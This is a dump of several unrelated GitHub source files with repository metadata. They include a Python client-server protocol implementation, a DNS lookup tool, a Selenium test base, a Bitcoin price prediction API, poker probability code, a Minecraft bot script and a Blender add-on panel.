ALIVE packet received from client \" + client.Id)\n client.setStatus(servermodule.SEND_ALIVE)\n client.firstALIVE = False\n elif not client.firstALIVE and client.Status == servermodule.SEND_ALIVE:\n debugMsg(\"Correct ALIVE packet received from client \" + client.Id)\n else:\n debugMsg(\"Error packet type received: \" + typeToString(\n ALIVE.Type) + \" with client \" + client.Id + \" in status \" + statusToString(\n client.Status))\n return\n\n client.ALIVEReceived = True\n sendALIVE(mainUDPSocket, client)\n\n\ndef ALIVETimer(client: Client):\n if client.firstALIVE:\n time.sleep(W)\n if not client.ALIVEReceived and client.Status == servermodule.REGISTERED:\n debugMsg(\"First ALIVE packet not received from client \" + client.Id)\n client.setStatus(servermodule.DISCONNECTED)\n return\n\n while client.ALIVELost < S and client.Status == servermodule.SEND_ALIVE:\n if client.ALIVETimer.name != threading.current_thread().name:\n debugMsg(\"Thread ALIVE timer with name \" + threading.current_thread().name + \" exited\")\n return\n time.sleep(V)\n if client.ALIVEReceived:\n client.ALIVEReceived = False\n client.ALIVELost = 0\n elif not client.ALIVEReceived:\n client.ALIVELost += 1\n debugMsg(\"Total ALIVE lost: \" + str(client.ALIVELost))\n if client.ALIVELost == 3:\n client.setStatus(servermodule.DISCONNECTED)\n\n\ndef sendALIVE(socketToSend, client: Client):\n ALIVEPacket = UDP_PDU(servermodule.ALIVE, serverCfg.Id, client.Id_Comm, client.Id)\n ALIVEPacket.send(socketToSend, client, client.defaultUDPort)\n\n\ndef sendALIVE_REJ(socketToSend, client: Client):\n ALIVE_REJPacket = UDP_PDU(servermodule.ALIVE_REJ, serverCfg.Id, client.Id_Comm, \"Incorrect ALIVE received\")\n ALIVE_REJPacket.send(socketToSend, client, client.defaultUDPort)\n\n\n# TCP FUNCTIONS\n\ndef handleTCPConnections(mainTCPSocket: socket.socket):\n while 1:\n mainTCPSocket.listen(1)\n (clientTCPSocket, (ip, port)) = mainTCPSocket.accept()\n debugMsg(\"New thread created for attending TCP in port\" + str(port))\n clientTCPThread = threading.Thread(target=handleTCPConnection, args=(clientTCPSocket, ip, port,))\n clientTCPThread.start()\n\n\ndef handleTCPConnection(clientSocket: socket.socket, ip, port):\n inputs, outputs, excepts = select.select([clientSocket], [], [], M)\n if len(inputs) == 0:\n debugMsg(\"Packet not received from \" + str(ip) + \":\" + str(port) + \" via TCP\")\n clientSocket.close()\n return\n\n bytesReceived = clientSocket.recv(TCPPacketSize, socket.MSG_WAITALL)\n\n packetReceived = unpackTCP(bytesReceived)\n\n if packetReceived.Type != servermodule.SEND_DATA:\n debugMsg(\"Packet of type \" + packetReceived.Type + \" received from TCP connection!\")\n clientSocket.close()\n return\n\n if not packetFromAuthedUser(packetReceived):\n debugMsg(\"Received a packet from unknown user via TCP\")\n DATA_REJ = TCP_PDU(servermodule.DATA_REJ, serverCfg.Id, \"0000000000\", \"\", \"\", \"Wrong client Id\")\n sendDATA_REJ(DATA_REJ, clientSocket, ip, port)\n clientSocket.close()\n return\n\n client = searchClient(packetReceived.Id_Trans)\n\n if packetReceived.Id_Comm != str(client.Id_Comm):\n debugMsg(\"Received an incorrect SEND_DATA packet [WRONG COMMUNICATION ID]\")\n DATA_REJ = TCP_PDU(servermodule.DATA_REJ, serverCfg.Id, \"0000000000\", packetReceived.Element,\n packetReceived.Value, \"[WRONG COMMUNICATION ID]\")\n DATA_REJ.send(clientSocket, client)\n client.setStatus(servermodule.DISCONNECTED)\n clientSocket.close()\n return\n\n if client.Status != servermodule.SEND_ALIVE:\n debugMsg(\"Received SEND_DATA packet in status 
\" + statusToString(client.Status))\n clientSocket.close()\n return\n\n element = Element(packetReceived.Element, packetReceived.Value)\n\n if not element.isFrom(client):\n debugMsg(\"Received SEND_DATA packet with an element that doesn't match any of the stored\")\n DATA_NACK = TCP_PDU(servermodule.DATA_NACK, serverCfg.Id, client.Id_Comm, packetReceived.Element,\n packetReceived.Value, \"Element\" + packetReceived.Element + \"is not from client\")\n DATA_NACK.send(clientSocket, client)\n clientSocket.close()\n return\n\n debugMsg(\"Correct SEND_DATA packet received from client \" + client.Id)\n element.store(client, packetReceived.Info, packetReceived.Type)\n\n DATA_ACK = TCP_PDU(servermodule.DATA_ACK, serverCfg.Id, client.Id_Comm, packetReceived.Element,\n packetReceived.Value, client.Id)\n DATA_ACK.send(clientSocket, client)\n\n clientSocket.close()\n debugMsg(\"Ended thread for attending TCP requests from port \" + str(port))\n\n\ndef unpackTCP(bytesReceived: bytes):\n unpackedPacket = struct.unpack('B 11s 11s 8s 16s 80s', bytesReceived)\n packetType = unpackedPacket[0]\n packetId_Trans = unpackedPacket[1].split(b\"\\x00\")[0].decode()\n packetId_Comm = unpackedPacket[2].split(b\"\\x00\")[0].decode()\n packetElement = unpackedPacket[3].split(b\"\\x00\")[0].decode()\n packetElementValue = unpackedPacket[4].split(b\"\\x00\")[0].decode()\n packetInfo = unpackedPacket[5].split(b\"\\x00\")[0].decode()\n return TCP_PDU(packetType, packetId_Trans, packetId_Comm, packetElement, packetElementValue, packetInfo)\n\n\ndef packTCP(packet: TCP_PDU):\n packedPacket = struct.pack('B 11s 11s 8s 16s 80s', packet.Type, str(packet.Id_Trans).encode(),\n str(packet.Id_Comm).encode(), str(packet.Element).encode(),\n str(packet.Value).encode(), str(packet.Info).encode())\n return packedPacket\n\n\ndef sendDATA_REJ(DATA_REJPacket, socketToSend, ip, port):\n DATA_REJPacked = packTCP(DATA_REJPacket)\n socketToSend.sendall(DATA_REJPacked)\n debugMsg(\"Packet DATA_REJ sent correctly to \" + str(ip) + \":\" + str(port))\n\n\n# CONSOLE HANDLING FUNCTIONS\n\ndef handleTerminalInput(): # USER TERMINAL INPUT\n while 1:\n command = input(Colors.CYAN + \"➪\\t\")\n line = command.split(\" \")\n if len(line[0]) < 1:\n continue\n elif line[0] == \"list\":\n listCommand()\n elif line[0] == \"set\":\n setCommand(line[1:])\n elif line[0] == \"get\":\n getCommand(line[1:])\n elif line[0] == \"quit\":\n quitCommand()\n else:\n errorMsg(\"The command entered is incorrect!\")\n printAvailableCommands()\n\n\ndef quitCommand():\n exit(0)\n\n\ndef setCommand(line):\n if len(line) < 3:\n errorMsg(\"Error usage of set command!!\\n set <client_id> <element_id> <value>\")\n return\n\n clientId = line[0]\n elementId = line[1]\n elementValue = line[2]\n\n client = searchClient(clientId)\n element = Element(elementId, elementValue)\n\n if client is None:\n errorMsg(\"Client id not exists!\")\n return\n\n if element.isFrom(client) is False:\n errorMsg(element.Id + \" is not from \" + client.Id)\n return\n\n if len(elementValue) < 1 or len(elementValue) > 15:\n errorMsg(\"Element value can't be None or greater than 15 numbers\")\n return\n\n if elementId.split(\"-\")[2] == \"O\":\n errorMsg(\"You can't modify a sensor element!!\")\n return\n\n if client.Status != servermodule.SEND_ALIVE:\n errorMsg(\"Client \" + client.Id + \"isn't in status SEND_ALIVE. 
Can't do the operation!\")\n return\n\n # Correct set command entered\n\n clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n clientSocket.bind(('', 0))\n\n try:\n clientSocket.connect((client.IP_Address, int(client.TCP)))\n except socket.error:\n errorMsg(\"Can't connect with client for sending SET_DATA packet!\")\n client.setStatus(servermodule.DISCONNECTED)\n clientSocket.close()\n return\n\n debugMsg(\"TCP connection established with \" + client.Id)\n\n SET_DATA = TCP_PDU(servermodule.SET_DATA, serverCfg.Id, client.Id_Comm, element.Id, element.Value, client.Id)\n SET_DATA.send(clientSocket, client)\n\n inputs, outputs, excepts = select.select([clientSocket], [], [], M)\n if len(inputs) == 0:\n print(Colors.WARNING + \"Client \" + client.Id + \"didn't answer to SET_DATA packet... resending information...\")\n clientSocket.close()\n return\n\n packetInBytes = clientSocket.recv(TCPPacketSize, socket.MSG_WAITALL)\n\n packet = unpackTCP(packetInBytes)\n if packet.Id_Trans != client.Id or packet.Id_Comm != str(client.Id_Comm) or packet.Element != element.Id:\n debugMsg(\"Received an incorrect \" + typeToString(packet.Type) + \" from client \" + client.Id)\n client.setStatus(servermodule.DISCONNECTED)\n clientSocket.close()\n return\n\n if packet.Type == servermodule.DATA_NACK:\n print(Colors.WARNING + \"Received a DATA_NACK packet from \" + client.Id + \". Resending information...\")\n clientSocket.close()\n return\n\n if packet.Type == servermodule.DATA_REJ:\n debugMsg(\"Received a DATA_REJ packet from \" + client.Id)\n errorMsg(\"Element value rejected from client \" + client.Id)\n client.setStatus(servermodule.DISCONNECTED)\n clientSocket.close()\n return\n\n if packet.Type == servermodule.DATA_ACK:\n debugMsg(\"Received a DATA_ACK packet from \" + client.Id)\n element.store(client, packet.Info, SET_DATA.Type)\n\n clientSocket.close()\n\n\ndef getCommand(line):\n if len(line) < 2:\n errorMsg(\"Error usage of get command!!\\n get <client_id> <element_id>\")\n return\n\n clientId = line[0]\n elementId = line[1]\n\n client = searchClient(clientId)\n element = Element(elementId)\n\n if client is None:\n errorMsg(\"Client id not exists!\")\n return\n\n if element.isFrom(client) is False:\n errorMsg(element.Id + \" is not from \" + client.Id)\n return\n\n if client.Status != servermodule.SEND_ALIVE:\n errorMsg(\"Client \" + client.Id + \"isn't in status SEND_ALIVE. Can't do the operation!\")\n return\n\n # Correct get command entered\n\n clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n clientSocket.bind(('', 0))\n\n try:\n clientSocket.connect((client.IP_Address, int(client.TCP)))\n except socket.error:\n errorMsg(\"Can't connect with client for sending GET_DATA packet!\")\n client.setStatus(servermodule.DISCONNECTED)\n clientSocket.close()\n return\n\n debugMsg(\"TCP connection established with \" + client.Id)\n\n GET_DATA = TCP_PDU(servermodule.GET_DATA, serverCfg.Id, client.Id_Comm, element.Id, \"\", client.Id)\n GET_DATA.send(clientSocket, client)\n\n inputs, outputs, excepts = select.select([clientSocket], [], [], M)\n if len(inputs) == 0:\n print(Colors.WARNING + \"Client \" + client.Id + \"didn't answer to GET_DATA packet... 
resending information...\")\n clientSocket.close()\n return\n\n packetInBytes = clientSocket.recv(TCPPacketSize, socket.MSG_WAITALL)\n\n packet = unpackTCP(packetInBytes)\n\n if packet.Id_Trans != client.Id or packet.Id_Comm != str(client.Id_Comm) or packet.Element != element.Id:\n debugMsg(\"Received an incorrect \" + typeToString(packet.Type) + \" from client \" + client.Id)\n client.setStatus(servermodule.DISCONNECTED)\n clientSocket.close()\n return\n\n if packet.Type == servermodule.DATA_NACK:\n print(Colors.WARNING + \"Received a DATA_NACK packet from \" + client.Id + \". Resending information...\")\n clientSocket.close()\n return\n\n if packet.Type == servermodule.DATA_REJ:\n debugMsg(\"Received a DATA_REJ packet from \" + client.Id)\n errorMsg(\"Element value rejected from client \" + client.Id)\n client.setStatus(servermodule.DISCONNECTED)\n clientSocket.close()\n return\n\n if packet.Type == servermodule.DATA_ACK:\n debugMsg(\"Received a DATA_ACK packet from \" + client.Id)\n element.store(client, packet.Info, GET_DATA.Type)\n\n clientSocket.close()\n\n\ndef printAvailableCommands():\n print(Colors.UNDERLINE + \"\\tCOMMANDS AVAILABLE:\" + Colors.END)\n print(Colors.CYAN + \"\\t➵ set <client_id> <element_id> <value>\")\n print(\"\\t\\tSets a value to a client element\")\n print(\"\\t➵ get <client_id> <element_id>\")\n print(\"\\t\\tGets the value from a client element\")\n print(\"\\t➵ list\")\n print(\"\\t\\tLists all the clients with its stats, comm. id, ip addresses and elements\")\n print(\"\\t➵ quit\")\n print(\"\\t\\tExits the server closing all the buffers, sockets, etc.\")\n\n\ndef listCommand():\n print(Colors.WARNING + \"╔═══════════╦════════════╦══════════════╦═══════════════╦═════════════════════\")\n print(\"║ CLIENT ID ║ STATUS ║ COMM. 
ID\\t║ IP ADDRESS\\t║ ELEMENTS\")\n print(\"╠═══════════╬════════════╬══════════════╬═══════════════╬═════════════════════\")\n print(\"╚═══════════╩════════════╩══════════════╩═══════════════╩═════════════════════\")\n for i in range(len(clients)):\n actualClient = clients[i]\n print(\" \" + actualClient.Id + \" \" + statusToString(actualClient.Status) + \"\\t \" + str(\n actualClient.Id_Comm) + \"\\t \" + str(actualClient.IP_Address) + \"\\t \", end=\"\")\n for k in range(len(actualClient.Elements)):\n print(actualClient.Elements[k].Id, end=\" \")\n print(\"\")\n\n\n# AUXILIARY FUNCTIONS\n\ndef statusToString(status):\n if status == servermodule.DISCONNECTED:\n return \"DISCONNECTED\"\n elif status == servermodule.WAIT_INFO:\n return \"WAIT_INFO\"\n elif status == servermodule.REGISTERED:\n return \"REGISTERED\"\n elif status == servermodule.NOT_REGISTERED:\n return \"NOT_REGISTERED\"\n elif status == servermodule.WAIT_ACK_REG:\n return \"WAIT_ACK_REG\"\n elif status == servermodule.WAIT_ACK_INFO:\n return \"WAIT_ACK_INFO\"\n elif status == servermodule.SEND_ALIVE:\n return \"SEND_ALIVE\"\n else:\n return \"Unknown status\"\n\n\ndef typeToString(packetType):\n if packetType == servermodule.REG_REQ:\n return \"REG_REQ\"\n elif packetType == servermodule.REG_ACK:\n return \"REG_ACK\"\n elif packetType == servermodule.REG_NACK:\n return \"REG_NACK\"\n elif packetType == servermodule.REG_REJ:\n return \"REG_REJ\"\n elif packetType == servermodule.REG_INFO:\n return \"REG_INFO\"\n elif packetType == servermodule.INFO_ACK:\n return \"INFO_ACK\"\n elif packetType == servermodule.INFO_NACK:\n return \"INFO_NACK\"\n elif packetType == servermodule.INFO_REJ:\n return \"INFO_REJ\"\n elif packetType == servermodule.ALIVE:\n return \"ALIVE\"\n elif packetType == servermodule.ALIVE_NACK:\n return \"ALIVE_NACK\"\n elif packetType == servermodule.ALIVE_REJ:\n return \"ALIVE_REJ\"\n elif packetType == servermodule.SEND_DATA:\n return \"SEND_DATA\"\n elif packetType == servermodule.DATA_ACK:\n return \"DATA_ACK\"\n elif packetType == servermodule.DATA_NACK:\n return \"DATA_NACK\"\n elif packetType == servermodule.DATA_REJ:\n return \"DATA_REJ\"\n elif packetType == servermodule.SET_DATA:\n return \"SET_DATA\"\n elif packetType == servermodule.GET_DATA:\n return \"GET_DATA\"\n else:\n return \"Unknown packet type\"\n\n\ndef searchClient(clientId):\n for i in range(len(clients)):\n if clients[i].Id == clientId:\n return clients[i]\n return None\n\n\ndef packetFromAuthedUser(packet):\n userToSearch = packet.Id_Trans\n for i in range(len(clients)):\n if clients[i].Id == userToSearch:\n return True\n return False\n\n\n# FORMATTING FUNCTIONS\n\ndef errorMsg(text):\n print(Colors.FAIL + \"[ERROR] =>\\t\" + text + Colors.END)\n\n\ndef okMsg(text):\n print(Colors.GREEN + \"[OK] =>\\t\" + text + Colors.END)\n\n\ndef infoMsg(text):\n print(\"[INFO] =>\\t\" + Colors.UNDERLINE + Colors.HEADER + text + Colors.END)\n\n\ndef debugMsg(text):\n if debug_mode:\n print(Colors.BLUE + \"[DEBUG] =>\\t\" + text + Colors.END)\n\n\n# MAIN FUNCTION\n\nif __name__ == \"__main__\":\n try:\n checkParams()\n readCfgFile()\n readAuthFile()\n startServer()\n except KeyboardInterrupt:\n serverCfg.mainTCP.close()\n serverCfg.mainUDP.close()\n print(Colors.WARNING + \"\\n[WARNING] =>\\tSERVER EXITED ABRUPTLY\")\n 
exit(0)\n","repo_name":"peremunoz/Client-Server","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":30423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"13036903671","text":"#!/usr/bin/env python\nimport socket,re\n\ndef convert_to_decimal(ip):\n    octets = ip.split('.')\n    decimal = int(octets[0])*16777216 + int(octets[1])*65536 + int(octets[2])*256 + int(octets[3])\n    return decimal\n\ndef convert_to_octets(decimal):\n    a = int(decimal / 16777216)\n    b = int(decimal / 65536) % 256\n    c = int(decimal / 256) % 256\n    d = int(decimal % 256)\n    ip = str(a) + '.' + str(b) + '.' + str(c) + '.' + str(d)\n    return ip\n\ndef get_fqdn(ip):\n    decimal = convert_to_decimal(ip)\n    ip_format = convert_to_octets(decimal)\n    resolved_ip = socket.gethostbyaddr(ip_format)\n    print('===> I got %s for %s\\n' %(resolved_ip[0], resolved_ip[2]))\n\n\ndef get_ip(fqdn):\n    resolved_name = socket.gethostbyname(fqdn)\n    print('===> I got %s for %s\\n' %(resolved_name, fqdn))\n\n\ndef main():\n    while True:\n        print(\"Enter an IP address or a DNS name:\")\n        ip_or_hostname = input()\n        isIP = re.compile(r'\\d+\\.\\d+\\.\\d+\\.\\d+')\n        if isIP.match(ip_or_hostname):\n            get_fqdn(ip_or_hostname)\n        else:\n            get_ip(ip_or_hostname)\n\nif __name__ == '__main__':\n    main()\n","repo_name":"alexandre-k/python-programs","sub_path":"nslookup.py","file_name":"nslookup.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6532203843","text":"from ttl.selenium import SeleniumExt\nimport unittest\nfrom selenium import *\n\nclass PrmaxWebBase(unittest.TestCase):\n\t\"\"\" base class for selenium tests \"\"\"\n\t# default selenium server details\n\t# this needs to be started before these tests can be run\n\tseleniumHost = 'localhost'\n\tseleniumPort = str(4444)\n\n\t# browser info\n\tFireFox = FIREFOX\n\tChrome = CHROME\n\tIEExplorer = IE\n\tSafari = \"*safari\"\n\n\t# default browser\n\tbrowserStartCommand = \"*firefox\"\n\n\t# default login details\n\tusername = \"Chris\"\n\tpassword = \"qwert\"\n\n\t# default prmax location\n\tbrowserURL = \"http://localhost\"\n\n\n\tdef setUp(self):\n\t\t\"\"\" default test start function \"\"\"\n\t\tprint(\"Using selenium server at \" + self.seleniumHost + \":\" + self.seleniumPort)\n\t\tprint(\"Browser is \" + self.browserStartCommand)\n\n\t\tself.selenium = SeleniumExt(self.seleniumHost,\n\t\t\t\t\t\t\t\t\tself.seleniumPort,\n\t\t\t\t\t\t\t\t\tself.browserStartCommand,\n\t\t\t\t\t\t\t\t\tself.browserURL)\n\t\tself.selenium.start()\n\n\tdef tearDown(self):\n\t\t\"\"\" default stop \"\"\"\n\t\tself.selenium.stop()\n\n\tdef do_login(self):\n\t\t\"\"\" common method to make sure the user is logged in \"\"\"\n\t\tsel = self.selenium\n\t\tsel.open(\"/login\")\n\t\tsel.type(\"user_name\", self.username)\n\t\tsel.type(\"password\", self.password)\n\t\tsel.click(\"login\")\n\t\tsel.wait_for_page_to_load(\"30000\")\n\t\t# this is part of the default template\n\t\tself.assertEqual(\"Prmax Main\", sel.get_title())\n\t\t# this is needed for all the js and pages to be built\n\t\tsel.wait(7)\n\n\tdef do_quick_outlet_name(self, search_text, count):\n\t\t\"\"\" does a basic search on the outlet name in the quick search form\n\t\tthis should always have at least one result \"\"\"\n\n\t\tself.do_login()\n\n\t\tsel = 
self.selenium\n\t\tsel.click_and_wait(\"dijit_form_Button_0\")\n\t\tsel.click(\"dijit_form_TextBox_1\")\n\t\tsel.type(\"dijit_form_TextBox_1\", search_text)\n\t\tsel.click_and_wait(\"std_search_search\", 7)\n\t\tself.do_check_result_count(sel, count)\n\n\tdef do_check_result_count(self, sel, count):\n\t\tself.assertEqual(\"total: %d\" % count, sel.get_text(\"std_view_tb.countinfo\").lower())\n\n\tdef do_check_result_count_zero(self, sel):\n\t\tself.assertEqual(\"total: 0\", sel.get_text(\"std_view_tb.countinfo\").lower())\n\n\n","repo_name":"meanang123/prmax","sub_path":"prmax/prmax/tests/selenium/_base.py","file_name":"_base.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20568322566","text":"bs = int(input(\"geef bs in (1= ongehuwd, 2 = gehuwd, 3= weduwe(naar) \"))\nleeftijd = int(input(\"geef de leeftijd in\"))\n# membership fee: unmarried (ongehuwd) 25, married (gehuwd) 20, widowed (weduwe(naar)) 15\n\nif bs == 1:\n    lidgeld = 25\nelif bs == 2:\n    lidgeld = 20\nelse:\n    lidgeld = 15\nprint(\"lidgeld = \", lidgeld)\n","repo_name":"SemihAltintasPXL/PXLToegepast-Informatica","sub_path":"Vakken_eerste_jaar/IT-Essentials/IT-Essentials-oefeningen/3_condities/voorbeelden/opdracht 3.11a.py","file_name":"opdracht 3.11a.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"nl","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"74286106753","text":"from pydantic import BaseModel\nimport numpy as np\nfrom joblib import load\nimport pathlib\nimport fastapi\n\napp = fastapi.FastAPI(title='Bitcoin Price Predictor')\n\nmodel = load(pathlib.Path('model/bitcoin-v10.joblib'))\n\nclass BitcoinPricePredictionData(BaseModel):\n    open_price: float = 10000\n    close_price: float = 10500\n    volume: float = 1000000\n\nclass BitcoinPricePredictionOutput(BaseModel):\n    price_prediction: float\n\n@app.post('/predict_price', response_model = BitcoinPricePredictionOutput)\ndef predict_price(data: BitcoinPricePredictionData):\n    model_input = np.array([data.open_price, data.close_price, data.volume]).reshape(1,-1)\n    result = model.predict(model_input)[0]\n\n    return {'price_prediction': result}\n","repo_name":"JesusSaith/Bitcoin-Price","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13479274238","text":"# For line-by-line memory usage\n\n# Put code in a function\n# Wrap the function in a decorator\n\n#import line_profiler\n#profile = line_profiler.LineProfiler()\n#from memory_profiler import profile\n\n@profile\ndef my_func():\n    a = [1] * (10 ** 6)\n    b = [2] * (2 * 10 ** 7)\n    del b\n    return a\n\nif __name__ == '__main__':\n    my_func()\n\n# Execute the code passing the option -m memory_profiler to the python interpreter\n# to load the memory_profiler module and print to stdout the line-by-line analysis\n\n# $ python -m memory_profiler example.py","repo_name":"AnaArabaci/sentiment_analysis","sub_path":"xxx.py","file_name":"xxx.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"17218272015","text":"#!/usr/bin/env python3\nimport random\nimport math\nimport csv\nimport ast\nimport numpy as np\n#import tensorflow as tf\nimport sys\n#sys.path[0:0] = ['/Users/JackOHara/Desktop/code/Pythonprograms/Poker/Poker2']\nfrom pokergamehead import *\nfrom loadprobs import *\n\ndef 
return_com(game1):\n num = []\n suits = []\n for x in game1.community.cards:\n num.append(x.number)\n suits.append(x.cardsuit)\n num.sort()\n #print num, suits\n threekind = 0\n for x in num:\n if num.count(x) == 3:\n threekind = 1\n twopair, onepair = check_pairs(num)\n if onepair == False:\n onepair = 0\n if twopair == False:\n twopair = 0\n\n if onepair != 0:\n onepair = 1\n if twopair != 0:\n twopair = 1\n\n highcard = return_highcard(0, game1.community)\n flush = 0\n for x in suits:\n if suits.count(x) > flush:\n flush = suits.count(x)\n num = list(set(num))\n num.sort()\n straight = [0]\n for x in num:\n tempstraight = 0\n for y in range(5):\n if (x+y) in num:\n tempstraight += 1\n straight.append(tempstraight)\n straight = max(straight)\n \n '''\n y = 0\n #Following checks for straight, pain in butt to make; careful\n while y < 2:\n x = 0\n check = 0\n while x < 4:\n #print num[len(num) - 1 - x - y] - 1, num[len(num) - 2 - x - y]\n try:\n if num[len(num) - 1 - x - y] - 1 == num[len(num) - 2 - x - y]:\n check += 1\n else:\n straight.append(check)\n check = 0\n except:\n break\n x += 1\n y += 1\n straight = max(straight)\n '''\n returns = [threekind, twopair, onepair, highcard, flush, straight]\n return returns\ndef check_rnnprob(rounds, game1, player1):\n card1 = max(player1.cards[0].number, player1.cards[1].number)\n card2 = min(player1.cards[0].number, player1.cards[1].number)\n samesuit = 0\n if player1.cards[0].cardsuit == player1.cards[1].cardsuit:\n samesuit = 1\n if rounds == 0:\n probability = rnnopenprobs.get((card1,card2,samesuit), .2)\n else:\n player1.update_score(game1.community)\n handtype = player1.handscore.type\n handlevel = player1.handscore.level\n if rounds == 1:\n probability = rnnflopprobs.get((card1, card2, samesuit, handtype, handlevel), .2)\n elif rounds == 2:\n probability = rnnturnprobs.get((card1, card2, samesuit, handtype, handlevel), .2)\n elif rounds == 3:\n probability = rnnriverprobs.get((card1, card2, samesuit, handtype, handlevel), .2)\n return probability\ndef check_prob(rounds, game1, players):\n if rounds == 0:\n card1 = players.cards[0].number\n card2 = players.cards[1].number\n samesuit = 0\n if players.cards[0].cardsuit == players.cards[1].cardsuit:\n samesuit = 1\n probability = openprobs.get((card1,card2,samesuit), .1)\n move = 0\n if probability <= .35:\n move = 0\n elif probability >= .6 and game1.previousbet < 80:\n move = 2\n else:\n move = 1\n return move, probability\n game1.compare_score(game1.player1, game1.secondplayer)\n if rounds == 1:\n probability = flopprobs.get((players.handscore.type - 2, players.handscore.level - 2), .1)\n move = 0\n if probability <= .4:\n move = 0\n elif probability >= .7 and game1.previousbet < 80:\n move = 2\n else:\n move = 1\n return move, probability\n if rounds == 2:\n probability = turnprobs.get((players.handscore.type - 2, players.handscore.level - 2), .1)\n move = 0\n if probability <= .4:\n move = 0\n elif probability >= .75 and game1.previousbet < 120:\n move = 2\n else:\n move = 1\n return move, probability\n if rounds == 3:\n probability = riverprobs.get((players.handscore.type - 2, players.handscore.level - 2, players.handscore.high - 2), .1)\n move = 0\n if probability <= .35:\n move = 0\n elif probability >= .75 and game1.previousbet < 80:\n move = 2\n else:\n move = 1\n return move, probability\n return 0, 0\ndef return_highcard(playerhand, community):\n num = []\n suits = []\n for x in community.cards:\n num.append(x.number)\n suits.append(x.cardsuit)\n if playerhand:\n 
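# note (editor's addition): fold the player's two hole cards into num/suits so the ranking checks below see all seven cards\n        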
num.append(playerhand.cards[0].number)\n num.append(playerhand.cards[1].number)\n suits.append(playerhand.cards[0].cardsuit)\n suits.append(playerhand.cards[1].cardsuit)\n check, flush = check_flush(suits, num)\n if check:\n return flush[0]\n straight = check_straight(num)\n if straight:\n return straight\n three, full = check_full(num)\n if three and full:\n return three\n if three:\n templist = []\n for x in num:\n if x != three:\n templist.append(x)\n templist.sort(reverse=True)\n return templist[0]\n twopair, pair = check_pairs(num)\n if twopair and pair:\n templist = []\n for x in num:\n if x != twopair and x != pair:\n templist.append(x)\n templist.sort(reverse=True)\n try:\n return templist[0]\n except:\n return twopair\n if pair:\n templist = []\n for x in num:\n if x != pair:\n templist.append(x)\n templist.sort(reverse=True)\n return templist[0]\n num.sort(reverse=True)\n if playerhand:\n return max([playerhand.cards[0].number, playerhand.cards[1].number])\n return num[0]\n\n \n'''\nfor x in range(5):\n a = session()\n b = game(a)\n b.start(a, prin=True)\n b.flop(prin=True)\n b.river(prin=True)\n b.river(prin=True)\n print return_highcard(b.player1, b.community)\n'''\n","repo_name":"jpo1332/huholdem","sub_path":"checkprobs.py","file_name":"checkprobs.py","file_ext":"py","file_size_in_byte":5995,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"19984883150","text":"from botchallenge import *\nfrom pathfindingUtils import *\nimport sys\n\ndef give_block(robot, TARGET_LIST):\n print(\"*** STARTING GIVE_BLOCK SCRIPT\")\n\n here = False\n ownerLoc = robot.get_owner_location()\n initialDist = int(robot.get_location().distance(ownerLoc))\n if initialDist < 5:\n face_owner(robot)\n here = True\n \n inventory = tuple_list_to_dict(robot.get_inventory())\n for blockType in TARGET_LIST:\n blockStr = str(blockType)\n if blockStr in inventory.keys():\n if not here:\n teleportThreshold = 20\n go_to_owner(robot, teleportThreshold)\n here = True\n qty = inventory[blockStr]\n message_all(robot, \"Here is all of my \" + blockStr.lower())\n robot.drop_item(blockType, qty)\n else:\n message_all(robot, \"I don't have any \" + blockStr.lower()\n + \" in my inventory.\")\n print(\"done!\")\n\ndef tuple_list_to_dict(tupleList): #hash by string\n resultDict = {}\n for tup in tupleList:\n resultDict[str(tup[0])] = tup[1]\n return resultDict\n\nTARGET_LIST_ARG = str(sys.argv[2])\nTARGET_LIST_ARG = TARGET_LIST_ARG[1:-1]\nTARGET_LIST_ARG = TARGET_LIST_ARG.split(',')\nTARGET_LIST_ARG = [x[:-1].split('(') for x in TARGET_LIST_ARG]\nTARGET_LIST_ARG = [BlockType(x[0], int(x[1])) for x in TARGET_LIST_ARG]\n\nrobot = Robot(str(sys.argv[1]), \"localhost\")\ngive_block(robot, TARGET_LIST_ARG)\n\nsys.exit() # make sure the program dies\n\n","repo_name":"jhaip/minecraft-put-that-there","sub_path":"command-scripts/giveblock.py","file_name":"giveblock.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"73090450435","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# 
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n# Hell is other people's code\n\nimport bpy\n\nclass VIEW3D_PT_wowbject_object_panel(bpy.types.Panel):\n bl_space_type = 'VIEW_3D'\n bl_region_type = 'UI'\n bl_category = \"Item\"\n bl_label = \"WoWbject Properties\"\n\n @classmethod\n def poll(cls, context):\n if context.view_layer.objects.active:\n if context.view_layer.objects.active.WBJ.initialized:\n return True\n\n def draw(self, context):\n layout = self.layout\n root = layout.column(align=True)\n\n obj = context.view_layer.objects.active\n obj_props = obj.WBJ\n\n op = root.operator('wm.path_open', icon='IMAGE_BACKGROUND', text=\"Open Source Folder\")\n 